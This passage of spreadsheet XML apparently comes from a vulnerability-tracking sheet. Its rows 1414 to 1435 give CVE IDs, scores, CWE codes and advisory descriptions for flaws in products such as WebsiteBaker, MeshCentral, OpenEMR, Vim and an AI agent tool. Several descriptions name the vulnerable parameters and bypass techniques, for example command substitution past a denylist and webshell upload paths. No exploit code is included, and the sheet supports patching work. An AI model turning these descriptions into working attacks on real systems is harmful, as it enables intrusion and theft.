      <c r="J1414" s="5" t="inlineStr"/>
      <c r="K1414" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1414" s="5" t="inlineStr">
        <is>
          <t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an OS command injection vulnerability in the ping diagnostic handler that allows authenticated administrators to execute arbitrary shell commands as root by injecting into the IpAddr parameter. The parameter is interpolated directly into a shell command executed through system() with an incomplete denylist that only blocks spaces, pipes, semicolons, and ampersands, leaving command substitution and alternate field separator expansion available for exploitation.</t>
        </is>
      </c>
      <c r="M1414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t>
        </is>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61523</t>
        </is>
      </c>
      <c r="C1415" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1415" s="5" t="inlineStr"/>
      <c r="F1415" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1415" s="5" t="inlineStr"/>
      <c r="H1415" s="5" t="inlineStr"/>
      <c r="I1415" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1415" s="5" t="inlineStr"/>
      <c r="K1415" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1415" s="5" t="inlineStr">
        <is>
          <t>WebsiteBaker CMS before 2.13.10 contains a code injection vulnerability in the Droplets editor that allows authenticated administrators to inject arbitrary PHP code by submitting malicious content through the droplet Code field, which is written verbatim to a publicly accessible PHP file with no content sanitization. Attackers can save a PHP webshell via the save_droplet handler to a predictable path inside the modules directory, enabling unauthenticated users to achieve remote code execution by making direct HTTP requests to the written file.</t>
        </is>
      </c>
      <c r="M1415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61523</t>
        </is>
      </c>
    </row>
    <row r="1416">
      <c r="A1416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61524</t>
        </is>
      </c>
      <c r="C1416" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1416" s="5" t="inlineStr"/>
      <c r="F1416" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1416" s="5" t="inlineStr"/>
      <c r="H1416" s="5" t="inlineStr"/>
      <c r="I1416" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1416" s="5" t="inlineStr"/>
      <c r="K1416" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1416" s="5" t="inlineStr">
        <is>
          <t>WebsiteBaker CMS before 2.13.10 contains an unrestricted file upload vulnerability in the module installation feature that allows authenticated administrators to achieve remote code execution by uploading a crafted ZIP archive containing a PHP webshell alongside a valid info.php metadata file. Attackers can place the malicious archive through the module installation interface, causing the application to extract the webshell into a web-accessible modules/ subdirectory where it becomes immediately executable by any unauthenticated user via direct HTTP request.</t>
        </is>
      </c>
      <c r="M1416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61524</t>
        </is>
      </c>
    </row>
    <row r="1417">
      <c r="A1417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63219</t>
        </is>
      </c>
      <c r="C1417" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1417" s="5" t="inlineStr"/>
      <c r="F1417" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1417" s="5" t="inlineStr"/>
      <c r="H1417" s="5" t="inlineStr"/>
      <c r="I1417" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1417" s="5" t="inlineStr"/>
      <c r="K1417" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1417" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the API endpoint for creating a new formatter via file upload is unprotected and allows the upload of external uncontrolled files. An unauthenticated attacker can upload arbitrary `.xsl` or `.zip` formatter files to the server.  An unauthenticated attacker can write arbitrary files into the GeoNetwork formatter directory. On its own this constitutes unauthorized write access to server storage. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="M1417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63219</t>
        </is>
      </c>
    </row>
    <row r="1418">
      <c r="A1418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63637</t>
        </is>
      </c>
      <c r="C1418" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1418" s="5" t="inlineStr"/>
      <c r="F1418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1418" s="5" t="inlineStr"/>
      <c r="H1418" s="5" t="inlineStr"/>
      <c r="I1418" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1418" s="5" t="inlineStr"/>
      <c r="K1418" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1418" s="5" t="inlineStr">
        <is>
          <t>Dgraph is an open source distributed GraphQL database. Prior to 25.3.8, maybeQuoteArg in graphql/resolve/query_rewriter.go passes regexp filter strings into generated DQL without quoting or validating the /pattern/flags form, allowing crafted GraphQL query or mutation filters to inject DQL operators, disclose unintended nodes, or expand modification and deletion targets. This issue is fixed in version 25.3.8.</t>
        </is>
      </c>
      <c r="M1418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63637</t>
        </is>
      </c>
    </row>
    <row r="1419">
      <c r="A1419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64199</t>
        </is>
      </c>
      <c r="C1419" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1419" s="5" t="inlineStr"/>
      <c r="F1419" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1419" s="5" t="inlineStr"/>
      <c r="H1419" s="5" t="inlineStr"/>
      <c r="I1419" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1419" s="5" t="inlineStr"/>
      <c r="K1419" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1419" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read outside the bounds of an allocated data structure.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64199</t>
        </is>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66420</t>
        </is>
      </c>
      <c r="C1420" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1420" s="5" t="inlineStr"/>
      <c r="F1420" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1420" s="5" t="inlineStr"/>
      <c r="H1420" s="5" t="inlineStr"/>
      <c r="I1420" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1420" s="5" t="inlineStr"/>
      <c r="K1420" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1420" s="5" t="inlineStr">
        <is>
          <t>MeshCentral 1.1.21 contains a cross-site WebSocket hijacking protection bypass vulnerability that allows unauthenticated remote attackers to hijack authenticated administrator sessions by exploiting an unconditional early return in the CheckWebServerOriginName() function within webserver.js when self-signed certificates are in use. Attackers can open cross-origin WebSocket connections to any of the twelve WebSocket endpoints, send crafted action commands to exfiltrate the server sessionKey used to sign session cookies, forge session tokens as arbitrary users, and gain full remote control of all managed devices governed by the MeshCentral instance.</t>
        </is>
      </c>
      <c r="M1420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66420</t>
        </is>
      </c>
    </row>
    <row r="1421">
      <c r="A1421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67328</t>
        </is>
      </c>
      <c r="C1421" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1421" s="5" t="inlineStr"/>
      <c r="F1421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1421" s="5" t="inlineStr"/>
      <c r="H1421" s="5" t="inlineStr"/>
      <c r="I1421" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1421" s="5" t="inlineStr"/>
      <c r="K1421" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1421" s="5" t="inlineStr">
        <is>
          <t>@better-auth/sso versions before 1.6.21 contain multiple authentication bypass vulnerabilities in SSO provider handling that allow attackers to sign in as arbitrary users. Attackers can exploit domain verification parsing mismatches, orphaned provider accounts, unbound SAML assertions, or reflected XSS on logout endpoints to gain unauthorized session access and account takeover.</t>
        </is>
      </c>
      <c r="M1421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67328</t>
        </is>
      </c>
    </row>
    <row r="1422">
      <c r="A1422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67340</t>
        </is>
      </c>
      <c r="C1422" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1422" s="5" t="inlineStr"/>
      <c r="F1422" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1422" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1422" s="5" t="inlineStr"/>
      <c r="I1422" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1422" s="5" t="inlineStr"/>
      <c r="K1422" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1422" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.7.2 (arcadedb-engine) allows trigger scripts to look up host classes in java.lang.* (via Java.type) because ScriptTriggerExecutor adds java.lang.* to the allowed packages. An authenticated user with UPDATE_SCHEMA permission can create a JavaScript trigger that invokes java.lang.Runtime.getRuntime().exec() (or ProcessBuilder), achieving OS command execution when the trigger fires.</t>
        </is>
      </c>
      <c r="M1422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67340</t>
        </is>
      </c>
    </row>
    <row r="1423">
      <c r="A1423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67608</t>
        </is>
      </c>
      <c r="C1423" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1423" s="5" t="inlineStr"/>
      <c r="F1423" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G1423" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1423" s="5" t="inlineStr"/>
      <c r="I1423" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1423" s="5" t="inlineStr"/>
      <c r="K1423" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1423" s="5" t="inlineStr">
        <is>
          <t>Telenia Software TVox 26.5.3 and prior 26.x versions, and 24.9.21 and prior 24.x versions, contain an OS command injection vulnerability in action_audio.php that allows authenticated attackers to execute arbitrary operating system commands by passing an unsanitized pid parameter into an exec() call when the action parameter is set to checkProcess. Attackers can inject malicious OS commands through the pid request parameter to execute arbitrary commands with the privileges of the apache user.</t>
        </is>
      </c>
      <c r="M1423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67608</t>
        </is>
      </c>
    </row>
    <row r="1424">
      <c r="A1424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67610</t>
        </is>
      </c>
      <c r="C1424" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1424" s="5" t="inlineStr"/>
      <c r="F1424" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1424" s="5" t="inlineStr"/>
      <c r="H1424" s="5" t="inlineStr"/>
      <c r="I1424" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1424" s="5" t="inlineStr"/>
      <c r="K1424" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1424" s="5" t="inlineStr">
        <is>
          <t>OpenEMR through 8.2.0 contains an improper authentication vulnerability in the OAuth2 dynamic client registration endpoint that allows unauthenticated attackers to register a malicious client with system-level FHIR scopes by supplying a self-generated RSA keypair via the jwks field. Once an administrator approves the registered client, attackers can use the client_credentials grant with a self-signed JWT assertion to obtain access tokens granting read access to all FHIR resources across all patients in the system.</t>
        </is>
      </c>
      <c r="M1424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67610</t>
        </is>
      </c>
    </row>
    <row r="1425">
      <c r="A1425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68581</t>
        </is>
      </c>
      <c r="C1425" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1425" s="5" t="inlineStr"/>
      <c r="F1425" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1425" s="5" t="inlineStr"/>
      <c r="H1425" s="5" t="inlineStr"/>
      <c r="I1425" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J1425" s="5" t="inlineStr"/>
      <c r="K1425" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1425" s="5" t="inlineStr">
        <is>
          <t>Vikunja versions 0.22.0 through 2.3.0 fail to validate the principal type in API token management. Because user IDs and link-share IDs are independent numeric sequences and both resolve through a generic web.Auth.GetID() interface, a link-share JWT whose numeric ID equals a target user's ID is treated as that user by the /api/v1/tokens endpoints. An authenticated attacker can obtain a target's numeric user ID via authenticated user search, then create link shares on an attacker-writable project until the link-share sequence reaches that value, and use the resulting link-share JWT to list, create, and delete the target user's API tokens (including issuing a new token with attacker-chosen scopes under the target's permissions). Fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M1425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68581</t>
        </is>
      </c>
    </row>
    <row r="1426">
      <c r="A1426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71309</t>
        </is>
      </c>
      <c r="C1426" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1426" s="5" t="inlineStr"/>
      <c r="F1426" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1426" s="5" t="inlineStr"/>
      <c r="H1426" s="5" t="inlineStr"/>
      <c r="I1426" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1426" s="5" t="inlineStr"/>
      <c r="K1426" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1426" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From 1.40.0 until 1.75.0, rclone serve restic does not correctly reject URL paths beginning with ../ in cmd/serve/restic/restic.go WithRemote, which accepts a leading parent path and passes it to GET, HEAD, POST, and DELETE handlers for configured backends including WebDAV, FTP, HTTP, Memory, and SFTP. An attacker who can access the REST endpoint may read, create, overwrite, or delete objects outside the path configured by the operator when the operator publishes a backend subdirectory and the backend credential can access parent or sibling objects. This issue is fixed in 1.75.0.</t>
        </is>
      </c>
      <c r="M1426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71309</t>
        </is>
      </c>
    </row>
    <row r="1427">
      <c r="A1427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71504</t>
        </is>
      </c>
      <c r="C1427" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1427" s="5" t="inlineStr"/>
      <c r="F1427" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1427" s="5" t="inlineStr"/>
      <c r="H1427" s="5" t="inlineStr"/>
      <c r="I1427" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1427" s="5" t="inlineStr"/>
      <c r="K1427" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-915</t>
        </is>
      </c>
      <c r="L1427" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the Members REST API that allows attackers with only member-creation rights to reset the password of any user account, including the system administrator, without verifying password-change permissions. Attackers can supply an arbitrary user account identifier and new password in the request body to overwrite credentials and immediately lock out the legitimate account holder.</t>
        </is>
      </c>
      <c r="M1427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71504</t>
        </is>
      </c>
    </row>
    <row r="1428">
      <c r="A1428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71963</t>
        </is>
      </c>
      <c r="C1428" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1428" s="5" t="inlineStr"/>
      <c r="F1428" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1428" s="5" t="inlineStr"/>
      <c r="H1428" s="5" t="inlineStr"/>
      <c r="I1428" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1428" s="5" t="inlineStr"/>
      <c r="K1428" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1428" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.18.2 through 0.21.0, fixed in commit f6234d0, contains a remote code execution vulnerability that allows attackers to execute arbitrary OS commands by supplying a malicious repository with a crafted .git/config that sets core.fsmonitor to an attacker-controlled command. When a user opens the malicious repository and sends any message, the agent triggers a git status index refresh which executes the injected command in the user's process context, exposing the full environment including configured provider API keys.</t>
        </is>
      </c>
      <c r="M1428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71963</t>
        </is>
      </c>
    </row>
    <row r="1429">
      <c r="A1429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72001</t>
        </is>
      </c>
      <c r="C1429" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1429" s="5" t="inlineStr"/>
      <c r="F1429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1429" s="5" t="inlineStr"/>
      <c r="H1429" s="5" t="inlineStr"/>
      <c r="I1429" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1429" s="5" t="inlineStr"/>
      <c r="K1429" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1429" s="5" t="inlineStr">
        <is>
          <t>Pangolin before 1.22.0 contains an authentication bypass vulnerability that allows unauthenticated attackers to access any protected resource by supplying an attacker-controlled URL parameter to the share-link authentication endpoint that omits the expected resource identifier from the token verification call. Attackers holding a single valid share link for any resource can authenticate against arbitrary resources across different organizations, bypassing all configured authentication methods including SSO, resource passwords, PIN codes, email allowlists, and header authentication.</t>
        </is>
      </c>
      <c r="M1429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72001</t>
        </is>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72741</t>
        </is>
      </c>
      <c r="C1430" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1430" s="5" t="inlineStr"/>
      <c r="F1430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1430" s="5" t="inlineStr"/>
      <c r="H1430" s="5" t="inlineStr"/>
      <c r="I1430" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1430" s="5" t="inlineStr"/>
      <c r="K1430" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1430" s="5" t="inlineStr">
        <is>
          <t>Rainbond through 6.9.7 contains a broken access control vulnerability in the CheckToken function that allows authenticated attackers to access unauthorized enterprise resources by substituting another enterprise's tenant name in URL paths. Attackers can use any valid API token to bypass enterprise ID verification and access or modify another enterprise's services, plugins, environment variables, and certificates.</t>
        </is>
      </c>
      <c r="M1430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72741</t>
        </is>
      </c>
    </row>
    <row r="1431">
      <c r="A1431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73078</t>
        </is>
      </c>
      <c r="C1431" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1431" s="5" t="inlineStr"/>
      <c r="F1431" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1431" s="5" t="inlineStr"/>
      <c r="H1431" s="5" t="inlineStr"/>
      <c r="I1431" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1431" s="5" t="inlineStr"/>
      <c r="K1431" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-77</t>
        </is>
      </c>
      <c r="L1431" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0840, runtime/plugin/netrwPlugin.vim loads netrw and runtime/pack/dist/opt/netrw/autoload/netrw.vim constructs Bookmarks, History, and Targets menu entries by interpolating attacker-controlled directory paths into executed :menu commands. s:NetrwBookmarkMenu(), s:NetrwTgtMenu(), g:netrw_menu_escape, EX_TRLBAR, and netrw#MakeTgt() fail to neutralize the | command separator or single quotes at five construction sites, allowing a crafted path browsed or bookmarked in GUI Vim to execute arbitrary Ex and operating-system commands. This issue is fixed in version 9.2.0840.</t>
        </is>
      </c>
      <c r="M1431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73078</t>
        </is>
      </c>
    </row>
    <row r="1432">
      <c r="A1432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73247</t>
        </is>
      </c>
      <c r="C1432" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1432" s="5" t="inlineStr"/>
      <c r="F1432" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1432" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1432" s="5" t="inlineStr"/>
      <c r="I1432" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1432" s="5" t="inlineStr"/>
      <c r="K1432" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1432" s="5" t="inlineStr">
        <is>
          <t>Kestra is an open-source, event-driven orchestration platform. Prior to 2.0.0, Kestra's core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java passes the user-controlled http() uri argument to URI.create() and the server-side HTTP client without restricting private, loopback, or link-local destinations, allowing an unauthenticated attacker to import and execute a flow that accesses internal services or cloud metadata.</t>
        </is>
      </c>
      <c r="M1432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73247</t>
        </is>
      </c>
    </row>
    <row r="1433">
      <c r="A1433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73612</t>
        </is>
      </c>
      <c r="C1433" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1433" s="5" t="inlineStr"/>
      <c r="F1433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1433" s="5" t="inlineStr"/>
      <c r="H1433" s="5" t="inlineStr"/>
      <c r="I1433" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1433" s="5" t="inlineStr"/>
      <c r="K1433" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1433" s="5" t="inlineStr">
        <is>
          <t>File Browser before v2.63.22 fails to validate access rules for descendants during recursive copy, rename, and delete operations, allowing authenticated users to bypass path-based access controls. Attackers can copy, rename, or delete denied files by operating on their allowed parent directory, defeating rule-based isolation for confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M1433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73612</t>
        </is>
      </c>
    </row>
    <row r="1434">
      <c r="A1434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73670</t>
        </is>
      </c>
      <c r="C1434" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1434" s="5" t="inlineStr"/>
      <c r="F1434" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1434" s="5" t="inlineStr"/>
      <c r="H1434" s="5" t="inlineStr"/>
      <c r="I1434" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1434" s="5" t="inlineStr"/>
      <c r="K1434" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1434" s="5" t="inlineStr">
        <is>
          <t>A CMS contains a SQL injection vulnerability in admin/db_data.php at line 509 that allows authenticated administrators to inject arbitrary SQL into a SHOW COLUMNS FROM statement by supplying unsanitized input through the table_name GET or POST parameter. Attackers can perform table traversal, time-based blind, boolean-based blind, and error-based injection techniques to enumerate full database schema, access system tables such as information_schema, and chain the disclosure with secondary injection points to extract credential data.</t>
        </is>
      </c>
      <c r="M1434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73670</t>
        </is>
      </c>
    </row>
    <row r="1435">
      <c r="A1435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
